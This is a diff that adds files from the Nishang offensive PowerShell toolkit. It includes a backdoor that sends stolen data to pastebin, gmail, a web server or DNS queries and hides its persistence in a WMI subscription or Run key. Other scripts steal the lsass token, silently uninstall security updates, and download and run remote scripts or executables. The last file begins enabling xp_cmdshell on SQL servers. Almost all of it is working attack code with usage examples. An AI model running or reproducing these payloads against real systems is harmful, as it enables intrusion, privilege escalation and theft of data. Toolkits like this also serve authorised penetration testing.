|
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
|
||||||
|
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
|
||||||
|
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
|
||||||
|
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif ($exfiloption -eq "gmail")
|
||||||
|
{
|
||||||
|
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
|
||||||
|
$smtpserver = “smtp.gmail.com”
|
||||||
|
$msg = new-object Net.Mail.MailMessage
|
||||||
|
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
|
||||||
|
$smtp.EnableSsl = $True
|
||||||
|
$smtp.Credentials = New-Object System.Net.NetworkCredential(“$username”, “$password”);
|
||||||
|
$msg.From = “$username@gmail.com”
|
||||||
|
$msg.To.Add(”$username@gmail.com”)
|
||||||
|
$msg.Subject = $pastename
|
||||||
|
$msg.Body = $pastevalue
|
||||||
|
if ($filename)
|
||||||
|
{
|
||||||
|
$att = new-object Net.Mail.Attachment($filename)
|
||||||
|
$msg.Attachments.Add($att)
|
||||||
|
}
|
||||||
|
$smtp.Send($msg)
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif ($exfiloption -eq "webserver")
|
||||||
|
{
|
||||||
|
$Data = Compress-Encode
|
||||||
|
post_http $URL $Data
|
||||||
|
}
|
||||||
|
elseif ($ExfilOption -eq "DNS")
|
||||||
|
{
|
||||||
|
$code = Compress-Encode
|
||||||
|
$lengthofsubstr = 0
|
||||||
|
$queries = [int]($code.Length/63)
|
||||||
|
while ($queries -ne 0)
|
||||||
|
{
|
||||||
|
$querystring = $code.Substring($lengthofsubstr,63)
|
||||||
|
Invoke-Expression "nslookup -querytype=txt $querystring.$DomaName $AuthNS"
|
||||||
|
$lengthofsubstr += 63
|
||||||
|
$queries -= 1
|
||||||
|
}
|
||||||
|
$mod = $code.Length%63
|
||||||
|
$query = $code.Substring($code.Length - $mod, $mod)
|
||||||
|
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
'@
|
||||||
|
$modulename = "HTTP-Backdoor.ps1"
|
||||||
|
if($persist -eq $True)
|
||||||
|
{
|
||||||
|
$name = "persist.vbs"
|
||||||
|
$options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString"
|
||||||
|
if ($exfil -eq $True)
|
||||||
|
{
|
||||||
|
$options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
|
||||||
|
}
|
||||||
|
Out-File -InputObject $body -Force $env:TEMP\$modulename
|
||||||
|
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
|
||||||
|
Out-File -InputObject $options -Append $env:TEMP\$modulename
|
||||||
|
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
|
||||||
|
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
|
||||||
|
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
|
||||||
|
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
|
||||||
|
{
|
||||||
|
$scriptpath = $env:TEMP
|
||||||
|
$scriptFileName = "$scriptpath\$name"
|
||||||
|
$filterNS = "root\cimv2"
|
||||||
|
$wmiNS = "root\subscription"
|
||||||
|
$query = @"
|
||||||
|
Select * from __InstanceCreationEvent within 30
|
||||||
|
where targetInstance isa 'Win32_LogonSession'
|
||||||
|
"@
|
||||||
|
$filterName = "WindowsSanity"
|
||||||
|
$filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
|
||||||
|
$consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name="WindowsSanity"; ScriptFileName=$scriptFileName; ScriptingEngine="VBScript"}
|
||||||
|
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -arguments @{Filter=$filterPath; Consumer=$consumerPath} | out-null
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
|
||||||
|
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
|
||||||
|
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString"
|
||||||
|
if ($exfil -eq $True)
|
||||||
|
{
|
||||||
|
$options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
|
||||||
|
}
|
||||||
|
Out-File -InputObject $body -Force $env:TEMP\$modulename
|
||||||
|
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
|
||||||
|
Out-File -InputObject $options -Append $env:TEMP\$modulename
|
||||||
|
Invoke-Expression $env:TEMP\$modulename
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
108
aspx/nishang/CHANGELOG.txt
Normal file
108
aspx/nishang/CHANGELOG.txt
Normal file
|
@ -0,0 +1,108 @@
|
||||||
|
0.3.6.4
|
||||||
|
- Get-PassHashes does not require SYSTEM privs anymore.
|
||||||
|
0.3.6.3
|
||||||
|
- Minor changes to Download-Execute-PS which now allows to pass arguments to scripts.
|
||||||
|
0.3.6.2
|
||||||
|
- Invoke-Encode can now output encoded command which could be used to execute scripts in a non-interactive shell.
|
||||||
|
0.3.6.1
|
||||||
|
- Powerpreter code made more readable.
|
||||||
|
- Powerpreter updated for recent changes done to other scripts in Nishang (Egress Testing, New Exfil methods, Bug fixes).
|
||||||
|
- Powerpreter persistence improved and bugs fixed.
|
||||||
|
- Bug fixes in HTTP-Backdoor and Execute_OnTime.
|
||||||
|
- Minor improvements to TextToExe and ExeToText scripts in Utility.
|
||||||
|
0.3.6
|
||||||
|
- Added Invoke-Encode.
|
||||||
|
- Changed compression and encoding methods used by Do-Exfitration, Backdoors, Invoke-Decode, Add-Exfiltration and Keylogger.
|
||||||
|
0.3.5
|
||||||
|
- Added Antak Webshell.
|
||||||
|
0.3.4
|
||||||
|
- Minor improvements in StringtoBase64.ps1
|
||||||
|
- Fixed a typo in Firelistener. Client port was not being displayed.
|
||||||
|
- All the scripts could be run using "dot source" now.
|
||||||
|
- All the scripts in Nishang could be loaded into current powershell session by importing Nishang.psm1 module.
|
||||||
|
- Added new exfiltration options, POST requests to Webserver and DNS txt queries.
|
||||||
|
- Removed exfiltration support for tinypaste.
|
||||||
|
- Exfiltration options have been removed from all scripts but Backdoors and Keylogger.
|
||||||
|
- Added Nishang.psm1
|
||||||
|
- Added Do-Exfiltration.ps1.
|
||||||
|
- Added Add-Exfiltration.ps1.
|
||||||
|
- Added Invoke-Decode.ps1.
|
||||||
|
- Removed Browse_Accept_Applet.ps1
|
||||||
|
0.3.3
|
||||||
|
- Minor bug fix in Copy-VSS.ps1
|
||||||
|
- Bug fix in Keylogger.ps1. It should log keys from a remote shell now (not powershell remoting).
|
||||||
|
0.3.2.2
|
||||||
|
- Download_Execute_PS.ps1 can now download and execute a Powershell script without writing it to disk.
|
||||||
|
- Execute_OnTime.ps1 and HTTP-Backdoor.ps1 executed the payload without downloading a file to disk.
|
||||||
|
- Fixed help in Brute-Force function in Powerpreter.
|
||||||
|
- Execute-OnTime, HTTP-Backdoor and Download-Execute-PS in Powerpreter now execute powershell scripts without downloading a file to disk.
|
||||||
|
- Added Firebuster.ps1 and Firelistener.ps1
|
||||||
|
0.3.2.1
|
||||||
|
- Fixed help and function name in Brute-Force.ps1
|
||||||
|
0.3.2
|
||||||
|
- Added Persistence to Keylogger, DNS_TXT_Pwnage, Execute_OnTime, HTTP-Backdoor and Powerpreter.
|
||||||
|
- Scirpts are now arranged in different directories.
|
||||||
|
- Added Add-Persistence.ps1 and Remove-Persistence.ps1
|
||||||
|
- Fixed minor bugs in scripts which use two parameterset.
|
||||||
|
- Invoke-NinjaCopy has been removed.
|
||||||
|
0.3.1
|
||||||
|
- Pivot now accepts multiple computers as input.
|
||||||
|
- Added Use-Session to interact with sessions created using Pivot.
|
||||||
|
0.3.0
|
||||||
|
- Added Powerpreter
|
||||||
|
- Added Execute-DNSTXT-Code
|
||||||
|
- Bug fix in Create-MultipleSessions.
|
||||||
|
- Changes to StringToBase64. It now supports Unicode encoding which makes it usable with -Encodedcommand.
|
||||||
|
- More Changes to StringToBase64. Now a file can be converted.
|
||||||
|
- Added Copy-VSS
|
||||||
|
- Information_Gather shows output in better format now.
|
||||||
|
- Information_Gather renamed to Get-Information.
|
||||||
|
- Wait for command renamed to HTTP-Backdoor.
|
||||||
|
- Time_Execution renamed Execute-OnTime
|
||||||
|
- Invoke-PingSweep renamed to Port-Scan
|
||||||
|
- Invoke-Medusa renamed to Brute-Force
|
||||||
|
0.2.9
|
||||||
|
- Run-EXEonRemote now accepts custom arguments for the executable.
|
||||||
|
- More examples added to the Keylogger.
|
||||||
|
0.2.8
|
||||||
|
- Fixed issues while using Get-LSASecret, Get-PassHashes, Get-WLAN-Keys and Information_Gather while using with Powershell v2
|
||||||
|
0.2.7
|
||||||
|
- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now be stopped remotely. Also, these does not stop autmoatically after running a script/command now.
|
||||||
|
- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now return results using selected exfiltration method.
|
||||||
|
- Fixed a minor bug in DNS_TXT_Pwnage.
|
||||||
|
- All payloads which could post data to the internet now have three options pastebin/gmail/tinypaste for exfiltration.
|
||||||
|
- Added Get-PassHashes payload.
|
||||||
|
- Added Download-Execute-PS payload.
|
||||||
|
- The keylogger logs only fresh keys after exfiltring the keys 30 times.
|
||||||
|
- A delay after success has been introduced in various payloads which connect to the internet to avoid generating too much traffic.
|
||||||
|
0.2.6
|
||||||
|
- Added Create-MultipleSessions script.
|
||||||
|
- Added Run-EXEonRemote script.
|
||||||
|
0.2.5
|
||||||
|
- Added Get-WLAN-Keys payload.
|
||||||
|
- Added Remove-Update payload.
|
||||||
|
- Fixed help in Credentials.ps1
|
||||||
|
- Minor changes in Donwload_Execute and Information_Gather.
|
||||||
|
0.2.1
|
||||||
|
- Added Execute-Command-MSSQL payload.
|
||||||
|
- Removed Get-SqlSysLogin payload
|
||||||
|
- Fixed a bug in Credentials.ps1
|
||||||
|
0.2.0
|
||||||
|
- Removed hard coded strings from DNS TXT Pwnage payload.
|
||||||
|
- Information Gather now pastes data base64 encoded, does not trigger pastebin spam filter anymore.
|
||||||
|
- Credentials payload now validates both local and AD crdentials. If creds entered could not be validated locally or at AD, credential prompt is shown again.
|
||||||
|
- Base64ToString now asks for a file containing base64 string. To provide a string in place of file use "-IsString" parameter.
|
||||||
|
- Browse_Accept_Applet now handles prompts for both 32 bit and 64 bit Internet Explorer. The wait time for the applet to load has also been increased .
|
||||||
|
- Added Enable_DuplicateToken payload.
|
||||||
|
- Added Get-LSASecret payload.
|
||||||
|
- Added Get-SqlSysLogin payload.
|
||||||
|
- Added Invoke-Medusa payload.
|
||||||
|
- Added Invoke-PingSweep payload.
|
||||||
|
|
||||||
|
0.1.1
|
||||||
|
- Fixed a bug in Parse_Keys. The function Parse_Keys was not being called.
|
||||||
|
- Changed help in Wait_For_Command.ps1
|
||||||
|
- Fixed a bug in Wait_For_Command. $MagicString was not being used instead a fixed string was matched to the result of $checkurl
|
||||||
|
- Removed delay in the credentials payload's prompt. Now the prompt asking for credentials will keep appearing instantly if nothing is entered.
|
||||||
|
- Added CHANGELOG to repo
|
||||||
|
- Removed hard coded credentials from Credentials.ps1 :| and edited the code to accept user input.
|
152
aspx/nishang/Escalation/Enable-DuplicateToken.ps1
Normal file
152
aspx/nishang/Escalation/Enable-DuplicateToken.ps1
Normal file
|
@ -0,0 +1,152 @@
|
||||||
|
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang payload which duplicates the Access token of lsass and sets it in the current process thread.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload duplicates the Access token of lsass and sets it in the current process thread.
|
||||||
|
The payload must be run with elevated permissions.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Enable-DuplicateToken
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://www.truesec.com
|
||||||
|
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/05/use-powershell-to-duplicate-process-tokens-via-p-invoke.aspx
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
|
||||||
|
.NOTES
|
||||||
|
Goude 2012, TreuSec
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Enable-DuplicateToken
|
||||||
|
{
|
||||||
|
[CmdletBinding()]
|
||||||
|
param()
|
||||||
|
|
||||||
|
$signature = @"
|
||||||
|
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||||
|
public struct TokPriv1Luid
|
||||||
|
{
|
||||||
|
public int Count;
|
||||||
|
public long Luid;
|
||||||
|
public int Attr;
|
||||||
|
}
|
||||||
|
|
||||||
|
public const int SE_PRIVILEGE_ENABLED = 0x00000002;
|
||||||
|
public const int TOKEN_QUERY = 0x00000008;
|
||||||
|
public const int TOKEN_ADJUST_PRIVILEGES = 0x00000020;
|
||||||
|
public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000;
|
||||||
|
|
||||||
|
public const UInt32 STANDARD_RIGHTS_READ = 0x00020000;
|
||||||
|
public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001;
|
||||||
|
public const UInt32 TOKEN_DUPLICATE = 0x0002;
|
||||||
|
public const UInt32 TOKEN_IMPERSONATE = 0x0004;
|
||||||
|
public const UInt32 TOKEN_QUERY_SOURCE = 0x0010;
|
||||||
|
public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040;
|
||||||
|
public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080;
|
||||||
|
public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100;
|
||||||
|
public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY);
|
||||||
|
public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY |
|
||||||
|
TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE |
|
||||||
|
TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT |
|
||||||
|
TOKEN_ADJUST_SESSIONID);
|
||||||
|
|
||||||
|
public const string SE_TIME_ZONE_NAMETEXT = "SeTimeZonePrivilege";
|
||||||
|
public const int ANYSIZE_ARRAY = 1;
|
||||||
|
|
||||||
|
[StructLayout(LayoutKind.Sequential)]
|
||||||
|
public struct LUID
|
||||||
|
{
|
||||||
|
public UInt32 LowPart;
|
||||||
|
public UInt32 HighPart;
|
||||||
|
}
|
||||||
|
|
||||||
|
[StructLayout(LayoutKind.Sequential)]
|
||||||
|
public struct LUID_AND_ATTRIBUTES {
|
||||||
|
public LUID Luid;
|
||||||
|
public UInt32 Attributes;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
public struct TOKEN_PRIVILEGES {
|
||||||
|
public UInt32 PrivilegeCount;
|
||||||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst=ANYSIZE_ARRAY)]
|
||||||
|
public LUID_AND_ATTRIBUTES [] Privileges;
|
||||||
|
}
|
||||||
|
|
||||||
|
[DllImport("advapi32.dll", SetLastError=true)]
|
||||||
|
public extern static bool DuplicateToken(IntPtr ExistingTokenHandle, int
|
||||||
|
SECURITY_IMPERSONATION_LEVEL, out IntPtr DuplicateTokenHandle);
|
||||||
|
|
||||||
|
|
||||||
|
[DllImport("advapi32.dll", SetLastError=true)]
|
||||||
|
[return: MarshalAs(UnmanagedType.Bool)]
|
||||||
|
public static extern bool SetThreadToken(
|
||||||
|
IntPtr PHThread,
|
||||||
|
IntPtr Token
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("advapi32.dll", SetLastError=true)]
|
||||||
|
[return: MarshalAs(UnmanagedType.Bool)]
|
||||||
|
public static extern bool OpenProcessToken(IntPtr ProcessHandle,
|
||||||
|
UInt32 DesiredAccess, out IntPtr TokenHandle);
|
||||||
|
|
||||||
|
[DllImport("advapi32.dll", SetLastError = true)]
|
||||||
|
public static extern bool LookupPrivilegeValue(string host, string name, ref long pluid);
|
||||||
|
|
||||||
|
[DllImport("kernel32.dll", ExactSpelling = true)]
|
||||||
|
public static extern IntPtr GetCurrentProcess();
|
||||||
|
|
||||||
|
[DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
|
||||||
|
public static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall,
|
||||||
|
ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen);
|
||||||
|
"@
|
||||||
|
|
||||||
|
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
|
||||||
|
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) {
|
||||||
|
Write-Warning "Run the Command as an Administrator"
|
||||||
|
Break
|
||||||
|
}
|
||||||
|
|
||||||
|
Add-Type -MemberDefinition $signature -Name AdjPriv -Namespace AdjPriv
|
||||||
|
$adjPriv = [AdjPriv.AdjPriv]
|
||||||
|
[long]$luid = 0
|
||||||
|
|
||||||
|
$tokPriv1Luid = New-Object AdjPriv.AdjPriv+TokPriv1Luid
|
||||||
|
$tokPriv1Luid.Count = 1
|
||||||
|
$tokPriv1Luid.Luid = $luid
|
||||||
|
$tokPriv1Luid.Attr = [AdjPriv.AdjPriv]::SE_PRIVILEGE_ENABLED
|
||||||
|
|
||||||
|
$retVal = $adjPriv::LookupPrivilegeValue($null, "SeDebugPrivilege", [ref]$tokPriv1Luid.Luid)
|
||||||
|
|
||||||
|
[IntPtr]$htoken = [IntPtr]::Zero
|
||||||
|
$retVal = $adjPriv::OpenProcessToken($adjPriv::GetCurrentProcess(), [AdjPriv.AdjPriv]::TOKEN_ALL_ACCESS, [ref]$htoken)
|
||||||
|
|
||||||
|
|
||||||
|
$tokenPrivileges = New-Object AdjPriv.AdjPriv+TOKEN_PRIVILEGES
|
||||||
|
$retVal = $adjPriv::AdjustTokenPrivileges($htoken, $false, [ref]$tokPriv1Luid, 12, [IntPtr]::Zero, [IntPtr]::Zero)
|
||||||
|
|
||||||
|
if(-not($retVal)) {
|
||||||
|
[System.Runtime.InteropServices.marshal]::GetLastWin32Error()
|
||||||
|
Break
|
||||||
|
}
|
||||||
|
|
||||||
|
$process = (Get-Process -Name lsass)
|
||||||
|
#$process.name
|
||||||
|
[IntPtr]$hlsasstoken = [IntPtr]::Zero
|
||||||
|
$retVal = $adjPriv::OpenProcessToken($process.Handle, ([AdjPriv.AdjPriv]::TOKEN_IMPERSONATE -BOR [AdjPriv.AdjPriv]::TOKEN_DUPLICATE), [ref]$hlsasstoken)
|
||||||
|
|
||||||
|
[IntPtr]$dulicateTokenHandle = [IntPtr]::Zero
|
||||||
|
$retVal = $adjPriv::DuplicateToken($hlsasstoken, 2, [ref]$dulicateTokenHandle)
|
||||||
|
|
||||||
|
$retval = $adjPriv::SetThreadToken([IntPtr]::Zero, $dulicateTokenHandle)
|
||||||
|
|
||||||
|
if(-not($retVal)) {
|
||||||
|
[System.Runtime.InteropServices.marshal]::GetLastWin32Error()
|
||||||
|
}
|
||||||
|
}
|
83
aspx/nishang/Escalation/Remove-Update.ps1
Normal file
83
aspx/nishang/Escalation/Remove-Update.ps1
Normal file
|
@ -0,0 +1,83 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang Payload which silently removes updates for a target machine.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload removes updates from a target machine. This could be
|
||||||
|
used to remove all updates, all security updates or a particular update.
|
||||||
|
|
||||||
|
.PARAMETER KBID
|
||||||
|
THE KBID of update you want to remove. All and Security are also validd.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Remove-Update All
|
||||||
|
This removes all updates from the target.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Remove-Update Security
|
||||||
|
This removes all security updates from the target.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Remove-Update KB2761226
|
||||||
|
This removes KB2761226 from the target.
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://trevorsullivan.net/2011/05/31/powershell-removing-software-updates-from-windows/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Remove-Update {
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$KBID
|
||||||
|
)
|
||||||
|
|
||||||
|
$HotFixes = Get-HotFix
|
||||||
|
|
||||||
|
foreach ($HotFix in $HotFixes)
|
||||||
|
{
|
||||||
|
|
||||||
|
if ($KBID -eq $HotFix.HotfixId)
|
||||||
|
{
|
||||||
|
|
||||||
|
$KBID = $HotFix.HotfixId.Replace("KB", "")
|
||||||
|
$RemovalCommand = "wusa.exe /uninstall /kb:$KBID /quiet /norestart"
|
||||||
|
Write-Host "Removing $KBID from the target."
|
||||||
|
Invoke-Expression $RemovalCommand
|
||||||
|
break
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($KBID -match "All")
|
||||||
|
{
|
||||||
|
$KBNumber = $HotFix.HotfixId.Replace("KB", "")
|
||||||
|
$RemovalCommand = "wusa.exe /uninstall /kb:$KBNumber /quiet /norestart"
|
||||||
|
Write-Host "Removing update $KBNumber from the target."
|
||||||
|
Invoke-Expression $RemovalCommand
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($KBID -match "Security")
|
||||||
|
{
|
||||||
|
if ($HotFix.Description -match "Security")
|
||||||
|
{
|
||||||
|
|
||||||
|
$KBSecurity = $HotFix.HotfixId.Replace("KB", "")
|
||||||
|
$RemovalCommand = "wusa.exe /uninstall /kb:$KBSecurity /quiet /norestart"
|
||||||
|
Write-Host "Removing Security Update $KBSecurity from the target."
|
||||||
|
Invoke-Expression $RemovalCommand
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
while (@(Get-Process wusa -ErrorAction SilentlyContinue).Count -ne 0)
|
||||||
|
{
|
||||||
|
Start-Sleep 3
|
||||||
|
Write-Host "Waiting for update removal to finish ..."
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
67
aspx/nishang/Execution/Download-Execute-PS.ps1
Normal file
67
aspx/nishang/Execution/Download-Execute-PS.ps1
Normal file
|
@ -0,0 +1,67 @@
|
||||||
|
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang Payload which downloads and executes a powershell script.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload downloads a powershell script from specified URL and then executes it on the target.
|
||||||
|
|
||||||
|
.PARAMETER ScriptURL
|
||||||
|
The URL from where the powershell script would be downloaded.
|
||||||
|
|
||||||
|
.PARAMETER Arguments
|
||||||
|
The Arguments to pass to the script when it is not downloaded to disk i.e. with -nodownload function.
|
||||||
|
|
||||||
|
.PARAMETER Nodownload
|
||||||
|
If this switch is used, the script is not dowloaded to the disk.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Download-Execute-PS http://pastebin.com/raw.php?i=jqP2vJ3x
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Download-Execute-PS http://script.alteredsecurity.com/evilscript.ps1 -Argument evilscript -nodownload
|
||||||
|
The above command does not dowload the script file to disk and executes the evilscript function inside the evilscript.ps1
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Download-Execute-PS
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$ScriptURL,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$Arguments,
|
||||||
|
|
||||||
|
[Switch]
|
||||||
|
$nodownload
|
||||||
|
)
|
||||||
|
|
||||||
|
if ($nodownload -eq $true)
|
||||||
|
{
|
||||||
|
Invoke-Expression ((New-Object Net.WebClient).DownloadString("$ScriptURL"))
|
||||||
|
if($Arguments)
|
||||||
|
{
|
||||||
|
Invoke-Expression $Arguments
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$webclient = New-Object System.Net.WebClient
|
||||||
|
$file1 = "$env:temp\deps.ps1"
|
||||||
|
$webclient.DownloadFile($ScriptURL,"$file1")
|
||||||
|
$script:pastevalue = powershell.exe -ExecutionPolicy Bypass -noLogo -command $file1
|
||||||
|
$pastevalue
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
36
aspx/nishang/Execution/Download_Execute.ps1
Normal file
36
aspx/nishang/Execution/Download_Execute.ps1
Normal file
|
@ -0,0 +1,36 @@
|
||||||
|
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang Payload to download an executable in text format, convert it to executable and execute.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload downloads an executable in text format, converts it to executable and execute.
|
||||||
|
Use exetotext.ps1 script to change an executable to text
|
||||||
|
|
||||||
|
.PARAMETER URL
|
||||||
|
The URL from where the file would be downloaded.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Download_Execute http://example.com/file.txt
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.blogspot.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Download_Execute
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$URL
|
||||||
|
)
|
||||||
|
|
||||||
|
$webclient = New-Object System.Net.WebClient
|
||||||
|
[string]$hexformat = $webClient.DownloadString($URL)
|
||||||
|
[Byte[]] $temp = $hexformat -split ' '
|
||||||
|
[System.IO.File]::WriteAllBytes("$env:temp\svcmondr.exe", $temp)
|
||||||
|
start-process -nonewwindow "$env:temp\svcmondr.exe"
|
||||||
|
}
|
120
aspx/nishang/Execution/Execute-Command-MSSQL.ps1
Normal file
120
aspx/nishang/Execution/Execute-Command-MSSQL.ps1
Normal file
|
@ -0,0 +1,120 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang payload which could be used to execute commands remotely on a MS SQL server.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload needs a valid administrator username and password on remote SQL server.
|
||||||
|
It uses the credentials to enable xp_cmdshell and provides a powershell shell, a sql shell
|
||||||
|
or a cmd shell on the target.
|
||||||
|
|
||||||
|
.PARAMETER ComputerName
|
||||||
|
Enter CopmuterName or IP Address of the target SQL server.
|
||||||
|
|
||||||
|
.PARAMETER UserName
|
||||||
|
Enter a UserName for a SQL server administrator account.
|
||||||
|
|
||||||
|
.PARAMETER Password
|
||||||
|
Enter the Password for the account.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS> Execute-Command-MSSQL -ComputerName sqlserv01 -UserName sa -Password sa1234
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS> Execute-Command-MSSQL -ComputerName 192.168.1.10 -UserName sa -Password sa1234
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://www.labofapenetrationtester.com/2012/12/command-execution-on-ms-sql-server-using-powershell.html
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
|
||||||
|
.NOTES
|
||||||
|
Based mostly on the Get-TSSqlSysLogin by Niklas Goude and accompanying blog post at
|
||||||
|
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/03/use-powershell-to-security-test-sql-server-and-sharepoint.aspx
|
||||||
|
http://www.truesec.com
|
||||||
|
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Execute-Command-MSSQL {
|
||||||
|
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Mandatory = $true, Position = 0, ValueFromPipeLine= $true)]
|
||||||
|
[Alias("PSComputerName","CN","MachineName","IP","IPAddress")]
|
||||||
|
[string]
|
||||||
|
$ComputerName,
|
||||||
|
|
||||||
|
[parameter(Mandatory = $true, Position = 1)]
|
||||||
|
[string]
